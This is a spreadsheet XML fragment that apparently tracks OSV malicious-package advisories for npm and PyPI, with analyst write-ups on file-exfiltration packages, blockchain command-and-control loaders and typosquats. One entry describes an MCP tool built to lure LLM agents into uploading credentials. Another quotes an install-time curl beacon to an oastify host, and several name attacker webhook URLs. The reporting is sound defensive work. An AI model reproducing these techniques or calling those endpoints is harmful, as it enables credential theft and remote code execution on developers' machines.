      <c r="O1050" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1050" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1050" s="5" t="inlineStr"/>
      <c r="R1050" s="5" t="inlineStr"/>
      <c r="S1050" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (87216e00fe68e2de8b140f1f9ffc2db5a8e814f38030e2eb6120c9ae9e7ca3ff)
The package exposes an MCP tool `send(path)` that reads a caller-specified local file and POSTs its contents to a hardcoded `https://webhook.site/4acf7132-a75e-47e1-aeff-0350c8eac16c` endpoint. The destination is a fixed public request-capture service, is not caller-configurable, and is not the installer's infrastructure. Any file path an LLM agent is induced to pass to `send` — including sensitive paths such as `~/.ssh/id_rsa`, `~/.aws/credentials`, `.env` files, or source trees — is uploaded to that third-party capture URL where the operator of the webhook can retrieve it. The package's advertised marketing/MCP framing does not match the actual behavior, which is a one-way file relay to an author-controlled inspection endpoint.
## Source: kam193 (6a271b29f840e2047c34363e985921e1a374194cfcae7524698f178c96bea9eb)
Package attempts to lure LLM agents to exfiltrate files to a hardcoded location. Analysis of infrastructure suggests preparing for exfiltrating credentials.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-marketing-mcp
Reasons (based on the campaign):
 - files-exfiltration
 - llm-threat
</t>
        </is>
      </c>
      <c r="T1050" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16250</t>
        </is>
      </c>
    </row>
    <row r="1051">
      <c r="A1051" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1051" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1051" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16251</t>
        </is>
      </c>
      <c r="D1051" s="5" t="inlineStr"/>
      <c r="E1051" s="5" t="inlineStr"/>
      <c r="F1051" s="5" t="inlineStr"/>
      <c r="G1051" s="5" t="inlineStr"/>
      <c r="H1051" s="5" t="inlineStr"/>
      <c r="I1051" s="5" t="inlineStr"/>
      <c r="J1051" s="5" t="inlineStr"/>
      <c r="K1051" s="5" t="inlineStr"/>
      <c r="L1051" s="5" t="inlineStr">
        <is>
          <t>npm:tailwindcss-contact-form</t>
        </is>
      </c>
      <c r="M1051" s="5" t="inlineStr"/>
      <c r="N1051" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1051" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1051" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1051" s="5" t="inlineStr"/>
      <c r="R1051" s="5" t="inlineStr"/>
      <c r="S1051" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (0b198bc6d5af472f9cb1f1db25acf0215b77c04a742fcce81fef5565d76d837b)
Package presents itself as the Tailwind CSS forms plugin (README is a verbatim copy of @tailwindcss/forms and its package.json points at github.com/tailwindlabs/tailwindcss-forms), and the README instructs users to require('tailwindcss-contact-form') from their tailwind.config.js. The single main file src/index.js is heavily obfuscated (obfuscator.io-style rotated string array, hex identifiers, control-flow flattening) and, when required, imports node:http/node:https and spawn from node:child_process, queries public Ethereum RPCs (eth.drpc.org, ethereum-rpc.publicnode.com, 1rpc.io/eth, public.blastapi.io) and the Blockscout txlist API for outbound transactions of the hardcoded address 0xa322E5f3D311D3080e6f0121063e9aDC2490Ef1a, extracts a base64 payload from transaction data (x-payload-B64), and executes it by spawning node. This is a remote-code-execution loader using the Ethereum blockchain as a command-and-control channel: whoever controls the hardcoded key controls code execution on every machine that imports the package. The Tailwind-forms cover story, verbatim README, and forged repository link exist to trick developers into wiring the require() into their build config.
</t>
        </is>
      </c>
      <c r="T1051" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16251</t>
        </is>
      </c>
    </row>
    <row r="1052">
      <c r="A1052" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1052" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1052" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16252</t>
        </is>
      </c>
      <c r="D1052" s="5" t="inlineStr"/>
      <c r="E1052" s="5" t="inlineStr"/>
      <c r="F1052" s="5" t="inlineStr"/>
      <c r="G1052" s="5" t="inlineStr"/>
      <c r="H1052" s="5" t="inlineStr"/>
      <c r="I1052" s="5" t="inlineStr"/>
      <c r="J1052" s="5" t="inlineStr"/>
      <c r="K1052" s="5" t="inlineStr"/>
      <c r="L1052" s="5" t="inlineStr">
        <is>
          <t>npm:ragacateslikodi</t>
        </is>
      </c>
      <c r="M1052" s="5" t="inlineStr"/>
      <c r="N1052" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1052" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1052" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1052" s="5" t="inlineStr"/>
      <c r="R1052" s="5" t="inlineStr"/>
      <c r="S1052" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (09a5a8774b4ce673a050b7e26c7d08aec66320fc14257196157363935ac19aa1)
On require/import of the package's main entry, a top-level async IIFE probes http://localhost:5000 for a hardcoded set of paths (/admin, /flag, /profile variants), concatenates status, length, and any body content matching flag patterns from those responses, and POSTs the aggregated result to a hardcoded webhook.site endpoint (https://webhook.site/1895d1d5-b227-4ce4-a2ce-232b1bec8b65). Package metadata is empty (no description, author, or repository), and the package ships no legitimate functionality alongside this behavior. Installing and importing this package causes any locally accessible service on port 5000 — including internal admin interfaces or CTF-style flag endpoints — to be scraped and its responses sent to an attacker-controlled collector.
</t>
        </is>
      </c>
      <c r="T1052" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16252</t>
        </is>
      </c>
    </row>
    <row r="1053">
      <c r="A1053" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1053" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1053" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16254</t>
        </is>
      </c>
      <c r="D1053" s="5" t="inlineStr"/>
      <c r="E1053" s="5" t="inlineStr"/>
      <c r="F1053" s="5" t="inlineStr"/>
      <c r="G1053" s="5" t="inlineStr"/>
      <c r="H1053" s="5" t="inlineStr"/>
      <c r="I1053" s="5" t="inlineStr"/>
      <c r="J1053" s="5" t="inlineStr"/>
      <c r="K1053" s="5" t="inlineStr"/>
      <c r="L1053" s="5" t="inlineStr">
        <is>
          <t>npm:pulse-pwn-9f3a2</t>
        </is>
      </c>
      <c r="M1053" s="5" t="inlineStr"/>
      <c r="N1053" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1053" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1053" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1053" s="5" t="inlineStr"/>
      <c r="R1053" s="5" t="inlineStr"/>
      <c r="S1053" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (f8086e23ce4b6ff1ca043ca8d9c83f384455e0baee3d06cd79e8a0d5d52c04e1)
index.js contains top-level code that fetches /profile and sends document.cookie together with the response body to a hardcoded webhook.site URL (https://webhook.site/42c6d937-77c7-42a5-8678-ef06b4501e38) via a GET request with the cookie and profile content passed as URL-encoded query parameters. Any consumer that requires or imports this package in a browser-like context leaks the caller's session cookies and /profile response to an attacker-controlled collector. The destination is a third-party request-inspection service unrelated to any documented purpose of the package, and the exfiltration path fires on module load rather than through an explicit API call.
</t>
        </is>
      </c>
      <c r="T1053" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16254</t>
        </is>
      </c>
    </row>
    <row r="1054">
      <c r="A1054" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1054" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1054" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16260</t>
        </is>
      </c>
      <c r="D1054" s="5" t="inlineStr"/>
      <c r="E1054" s="5" t="inlineStr"/>
      <c r="F1054" s="5" t="inlineStr"/>
      <c r="G1054" s="5" t="inlineStr"/>
      <c r="H1054" s="5" t="inlineStr"/>
      <c r="I1054" s="5" t="inlineStr"/>
      <c r="J1054" s="5" t="inlineStr"/>
      <c r="K1054" s="5" t="inlineStr"/>
      <c r="L1054" s="5" t="inlineStr">
        <is>
          <t>npm:confx1789550882</t>
        </is>
      </c>
      <c r="M1054" s="5" t="inlineStr"/>
      <c r="N1054" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1054" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1054" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1054" s="5" t="inlineStr"/>
      <c r="R1054" s="5" t="inlineStr"/>
      <c r="S1054" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (72ce9bca41cb0378952b582d6f115a3bffd2acea4999a90bae5f916428921b64)
The package's main file index.js is an IIFE that, when loaded in a browser same-origin context (e.g. via unpkg), reads location.href and document.cookie, fetches authenticated endpoints such as /profile, /admin, /dev, /flag, and /me with credentials:'include', and POSTs the responses along with a matched flag pattern to the hardcoded webhook https://webhook.site/04d98207-c947-4938-9f0c-f92feae051cb/. package.json contains only a 'ctf' description with no author or repository, and the single shipped artifact is this exfiltration payload. Comments in the file describe it as an unpkg-hosted exfil payload.
</t>
        </is>
      </c>
      <c r="T1054" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16260</t>
        </is>
      </c>
    </row>
    <row r="1055">
      <c r="A1055" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1055" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1055" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16261</t>
        </is>
      </c>
      <c r="D1055" s="5" t="inlineStr"/>
      <c r="E1055" s="5" t="inlineStr"/>
      <c r="F1055" s="5" t="inlineStr"/>
      <c r="G1055" s="5" t="inlineStr"/>
      <c r="H1055" s="5" t="inlineStr"/>
      <c r="I1055" s="5" t="inlineStr"/>
      <c r="J1055" s="5" t="inlineStr"/>
      <c r="K1055" s="5" t="inlineStr"/>
      <c r="L1055" s="5" t="inlineStr">
        <is>
          <t>npm:@railone/image-utils</t>
        </is>
      </c>
      <c r="M1055" s="5" t="inlineStr"/>
      <c r="N1055" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1055" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1055" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1055" s="5" t="inlineStr"/>
      <c r="R1055" s="5" t="inlineStr"/>
      <c r="S1055" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (ebec05d8415347cef93849315a26f4221e34efa278fffe1b89700af039246dc6)
On import, index.js calls initialize() which spawns a detached, stdio-suppressed, windowsHide `node loader.js` child (init.js) and records its PID. loader.js HTTPS-fetches JSON from https://api.npoint.io/641d37178a880b1e8b8f, base64-decodes the `code` field, and executes it via `new Function('require','__dirname','__filename','module','exports', decodedCode)(...)`, running arbitrary attacker-controlled JavaScript on the installer's host with full Node privileges and network access. The npoint.io endpoint is a mutable third-party JSON store whose contents can be changed at any time by whoever controls that resource, giving that party a persistent remote code-push channel into every installer. The package advertises itself as an image/runtime utility exposing `getProcessInfo`/`getRuntimeInfo`, but no such functions are exported; internal comments identify the code as an 'ID-10 Client Module' for 'device information collection and remote code execution' with 'AUTO-START ON IMPORT'.
</t>
        </is>
      </c>
      <c r="T1055" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16261</t>
        </is>
      </c>
    </row>
    <row r="1056">
      <c r="A1056" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1056" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1056" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16262</t>
        </is>
      </c>
      <c r="D1056" s="5" t="inlineStr"/>
      <c r="E1056" s="5" t="inlineStr"/>
      <c r="F1056" s="5" t="inlineStr"/>
      <c r="G1056" s="5" t="inlineStr"/>
      <c r="H1056" s="5" t="inlineStr"/>
      <c r="I1056" s="5" t="inlineStr"/>
      <c r="J1056" s="5" t="inlineStr"/>
      <c r="K1056" s="5" t="inlineStr"/>
      <c r="L1056" s="5" t="inlineStr">
        <is>
          <t>npm:tailwindcss-form-ui</t>
        </is>
      </c>
      <c r="M1056" s="5" t="inlineStr"/>
      <c r="N1056" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1056" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1056" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1056" s="5" t="inlineStr"/>
      <c r="R1056" s="5" t="inlineStr"/>
      <c r="S1056" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c7a21e4623006a0c69e3dfeb80857eadd9102550c8a77c1d95e880245a5f0fa9)
Package name and repository field impersonate the legitimate tailwindlabs/tailwindcss-forms plugin, but the shipped main entry src/index.js is a fully obfuscated (obfuscator.io string-array) module that has nothing to do with Tailwind CSS. On module load it imports node:child_process (spawn), node:http/https, node:zlib and node:url, builds a list of Ethereum JSON-RPC endpoints (process.env.ETH_RPC_URL, *.publicnode.com, drpc.org, 1rpc.io/eth, blockscout) and an Etherscan-style txlist URL for the hardcoded sender address 0xa322E5f39aDC2490EfD311D3080e6f0121063e1a, and polls eth_blockNumber / eth_getBlockByNumber / eth_getTransactionCount to retrieve attacker-published transactions. The retrieved payloads are decompressed via gunzip/inflate/brotli and passed to child_process.spawn, giving whoever controls that Ethereum address arbitrary command execution on any host that requires or imports the package. The on-chain command channel is takedown-resistant. The Tailwind-forms identity, the obfuscated main, and the require-time RCE together form a cover-story typosquat delivering installer-side remote code execution.
</t>
        </is>
      </c>
      <c r="T1056" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16262</t>
        </is>
      </c>
    </row>
    <row r="1057">
      <c r="A1057" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1057" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1057" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16263</t>
        </is>
      </c>
      <c r="D1057" s="5" t="inlineStr"/>
      <c r="E1057" s="5" t="inlineStr"/>
      <c r="F1057" s="5" t="inlineStr"/>
      <c r="G1057" s="5" t="inlineStr"/>
      <c r="H1057" s="5" t="inlineStr"/>
      <c r="I1057" s="5" t="inlineStr"/>
      <c r="J1057" s="5" t="inlineStr"/>
      <c r="K1057" s="5" t="inlineStr"/>
      <c r="L1057" s="5" t="inlineStr">
        <is>
          <t>npm:tailwindcss-form-utils</t>
        </is>
      </c>
      <c r="M1057" s="5" t="inlineStr"/>
      <c r="N1057" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1057" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1057" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1057" s="5" t="inlineStr"/>
      <c r="R1057" s="5" t="inlineStr"/>
      <c r="S1057" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (1eab685b70dc7394ba9eade13925f6da52267f61edcf8ba204bcf9ac3bd4c7bc)
The package publishes under the name tailwindcss-form-utils while pointing its repository field at https://github.com/tailwindlabs/tailwindcss-forms and mirroring that project's README verbatim, positioning itself as a lookalike of the first-party Tailwind Labs forms plugin. Its main entrypoint src/index.js is heavily obfuscated (obfuscator.io string-array with rotation, hex identifier renaming, 303 encoded string entries) and, once decoded, imports node:http, node:https, node:zlib, node:url and node:child_process spawn. It hard-codes an Ethereum sender address 0xa322E5f3D311D3080e9aDC2490Ef6f0121063e1a and queries Ethereum RPC endpoints (1rpc.io/eth, *.publicnode.com, eth.drpc.org) plus a blockscout/etherscan-style txlist indexer to retrieve transaction payloads authored by that address, reconstructs JavaScript source from the returned data, and injects it into the global scope (global.r=require, global.m=module) before executing it via child_process spawn. The blockchain acts as a mutable, attacker-writable command channel: whichever payload the attacker's address most recently published in a transaction becomes code executed on every require of the package. A Tailwind CSS plugin has no legitimate need for child_process, HTTP fetches to Ethereum RPCs, or dynamic global code assembly.
</t>
        </is>
      </c>
      <c r="T1057" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16263</t>
        </is>
      </c>
    </row>
    <row r="1058">
      <c r="A1058" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1058" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1058" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16264</t>
        </is>
      </c>
      <c r="D1058" s="5" t="inlineStr"/>
      <c r="E1058" s="5" t="inlineStr"/>
      <c r="F1058" s="5" t="inlineStr"/>
      <c r="G1058" s="5" t="inlineStr"/>
      <c r="H1058" s="5" t="inlineStr"/>
      <c r="I1058" s="5" t="inlineStr"/>
      <c r="J1058" s="5" t="inlineStr"/>
      <c r="K1058" s="5" t="inlineStr"/>
      <c r="L1058" s="5" t="inlineStr">
        <is>
          <t>PyPI:aiosendletter</t>
        </is>
      </c>
      <c r="M1058" s="5" t="inlineStr"/>
      <c r="N1058" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1058" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1058" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q1058" s="5" t="inlineStr"/>
      <c r="R1058" s="5" t="inlineStr"/>
      <c r="S1058" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (29baa6f2cbfb2ef9907be7830505e33e82b5a1e6a45eb7f995022d09f5841f09)
The package advertises itself as a 'safe bug reporter' but its init() function archives the contents of %LOCALAPPDATA%\logs with shutil.make_archive and POSTs the resulting archive to a hardcoded, non-configurable Cloudflare Workers endpoint at https://sparkling-pine-f202.stilluer-sweden.workers.dev/. The destination is author-controlled, the caller has no way to redirect or disable it, and code comments indicate the target directory is expected to include a Telegram bot token folder — the collected data is credential-adjacent local state leaving the installer's machine. On Windows the same function calls ctypes.windll.shell32.ShellExecuteW with the 'runas' verb to relaunch the interpreter under UAC elevation before performing the archive-and-upload, broadening the set of files reachable for collection. Separately, pyproject.toml declares 'ctypes' as a runtime dependency; ctypes is a Python standard-library module, so pip resolves this name against PyPI and installs whatever package is published there under 'ctypes', executing that third party's code at install time. The cover-story description, the hardcoded off-host destination for locally-collected data, the privilege escalation, and the stdlib-name dependency-confusion vector jointly constitute an active supply-chain attack on installers.
## Source: kam193 (4e81e3b63bbe719f6d0bdd42930bb2f3235b8e41cbacf449743bb7dca67c9f08)
Package hides code to exfiltrate files. Most releases target unclear files, but some reveal the goal to exfiltrate sensitive Telegram data.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-aiosendletter
Reasons (based on the campaign):
 - files-exfiltration
 - target:telegram
</t>
        </is>
      </c>
      <c r="T1058" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16264</t>
        </is>
      </c>
    </row>
    <row r="1059">
      <c r="A1059" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1059" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1059" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16267</t>
        </is>
      </c>
      <c r="D1059" s="5" t="inlineStr"/>
      <c r="E1059" s="5" t="inlineStr"/>
      <c r="F1059" s="5" t="inlineStr"/>
      <c r="G1059" s="5" t="inlineStr"/>
      <c r="H1059" s="5" t="inlineStr"/>
      <c r="I1059" s="5" t="inlineStr"/>
      <c r="J1059" s="5" t="inlineStr"/>
      <c r="K1059" s="5" t="inlineStr"/>
      <c r="L1059" s="5" t="inlineStr">
        <is>
          <t>PyPI:pyjstat-smooth</t>
        </is>
      </c>
      <c r="M1059" s="5" t="inlineStr"/>
      <c r="N1059" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1059" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1059" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q1059" s="5" t="inlineStr"/>
      <c r="R1059" s="5" t="inlineStr"/>
      <c r="S1059" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (f65efaaf25b41d789624595550d966762b21747205b23f15325db2e05924387d)
The package (advertised as a JSON-stat library) ships a test module that, when the test suite is executed, walks the /app and /Users directory trees, targets files ending in 'flags.json' (with an expected path '/app/injection_range/corpus/treasure/flags.json'), and uploads matched file contents to https://api.anthropic.com/v1/files. Authentication uses a hardcoded Anthropic API key ('sk-ant-api03-...') that is reassembled at runtime from split base64 fragments (baseA/baseB/baseC/baseD concatenated and base64-decoded inside _assembled_test_key()); the installer's own ANTHROPIC_API_KEY environment variable is explicitly ignored, so uploads occur under the author's Anthropic account regardless of the installer's configuration. setup.py declares test_suite='pyjstat.test' and the file uses a pytest-discoverable test_*.py name, so any installer running the shipped test suite triggers filesystem enumeration and upload of arbitrary local file contents to a third-party endpoint under the author's control. The runtime reassembly of the credential from split base64 fragments is a deliberate evasion of secret scanners and, together with the flag-hunting file walk, is inconsistent with legitimate library testing.
## Source: kam193 (82a12638b869aecb566588c24c0f59c3137f9b89a26ae67222370249a7176a75)
The package hides code to exfiltrate specific files from the user's machine. The used file paths suggest it was intended to be used in a CTF-like environment.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-pyjstat-smooth
Reasons (based on the campaign):
 - files-exfiltration
 - obfuscation
 - targetted-attack
 - clones-real-package
</t>
        </is>
      </c>
      <c r="T1059" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16267</t>
        </is>
      </c>
    </row>
    <row r="1060">
      <c r="A1060" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1060" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1060" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16268</t>
        </is>
      </c>
      <c r="D1060" s="5" t="inlineStr"/>
      <c r="E1060" s="5" t="inlineStr"/>
      <c r="F1060" s="5" t="inlineStr"/>
      <c r="G1060" s="5" t="inlineStr"/>
      <c r="H1060" s="5" t="inlineStr"/>
      <c r="I1060" s="5" t="inlineStr"/>
      <c r="J1060" s="5" t="inlineStr"/>
      <c r="K1060" s="5" t="inlineStr"/>
      <c r="L1060" s="5" t="inlineStr">
        <is>
          <t>PyPI:index-forum</t>
        </is>
      </c>
      <c r="M1060" s="5" t="inlineStr"/>
      <c r="N1060" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1060" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1060" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1060" s="5" t="inlineStr"/>
      <c r="R1060" s="5" t="inlineStr"/>
      <c r="S1060" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (7561fd94425cdde34f5f9f3d20482a0da8680414d0f38e1e00fea419ce23cf66)
The package hides code to exfiltrate specific files from the user's machine. The used file paths suggest it was intended to be used in a CTF-like environment.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-pyjstat-smooth
Reasons (based on the campaign):
 - files-exfiltration
 - obfuscation
 - targetted-attack
 - clones-real-package
</t>
        </is>
      </c>
      <c r="T1060" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16268</t>
        </is>
      </c>
    </row>
    <row r="1061">
      <c r="A1061" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1061" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1061" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16269</t>
        </is>
      </c>
      <c r="D1061" s="5" t="inlineStr"/>
      <c r="E1061" s="5" t="inlineStr"/>
      <c r="F1061" s="5" t="inlineStr"/>
      <c r="G1061" s="5" t="inlineStr"/>
      <c r="H1061" s="5" t="inlineStr"/>
      <c r="I1061" s="5" t="inlineStr"/>
      <c r="J1061" s="5" t="inlineStr"/>
      <c r="K1061" s="5" t="inlineStr"/>
      <c r="L1061" s="5" t="inlineStr">
        <is>
          <t>PyPI:requests-asetwe</t>
        </is>
      </c>
      <c r="M1061" s="5" t="inlineStr"/>
      <c r="N1061" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1061" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1061" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q1061" s="5" t="inlineStr"/>
      <c r="R1061" s="5" t="inlineStr"/>
      <c r="S1061" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c0316bf059751a9ece4fb034e225276529692338dc671ad9929e16faf8c843d5)
setup.py of requests-asetwe unconditionally executes `os.system('curl -s https://w5223hr2yr968bhwql8bv5n8ozuqih66.oastify.com')` during `pip install`. The destination is a Burp Collaborator (oastify.com) subdomain — an out-of-band interaction service used to confirm code execution and collect the victim's IP/DNS metadata on the attacker's collaborator instance. The package name is a lookalike of the widely-used `requests` package, and the shipped setup.py has no legitimate reason to contact an anonymous oastify subdomain at install time. Installing the package causes the installer's host to beacon to attacker-controlled infrastructure automatically.
## Source: kam193 (7078a9b4fc2be32cbeb1f2c20ec67834c8e293bd410ceeb4842cacd8340d9835)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061" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16269</t>
        </is>
      </c>
    </row>
    <row r="1062">
      <c r="A1062" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1062" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1062" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16270</t>
        </is>
      </c>
      <c r="D1062" s="5" t="inlineStr"/>
      <c r="E1062" s="5" t="inlineStr"/>
      <c r="F1062" s="5" t="inlineStr"/>
      <c r="G1062" s="5" t="inlineStr"/>
      <c r="H1062" s="5" t="inlineStr"/>
      <c r="I1062" s="5" t="inlineStr"/>
      <c r="J1062" s="5" t="inlineStr"/>
      <c r="K1062" s="5" t="inlineStr"/>
      <c r="L1062" s="5" t="inlineStr">
        <is>
          <t>npm:@tink/tink-link-core</t>
        </is>
      </c>
      <c r="M1062" s="5" t="inlineStr"/>
      <c r="N1062" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1062" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1062" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1062" s="5" t="inlineStr"/>
      <c r="R1062" s="5" t="inlineStr"/>
      <c r="S1062" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (826e81131e7b2a296324d469c10f1e44d5b33683703c8a2e0f101a8674c1cfcf)
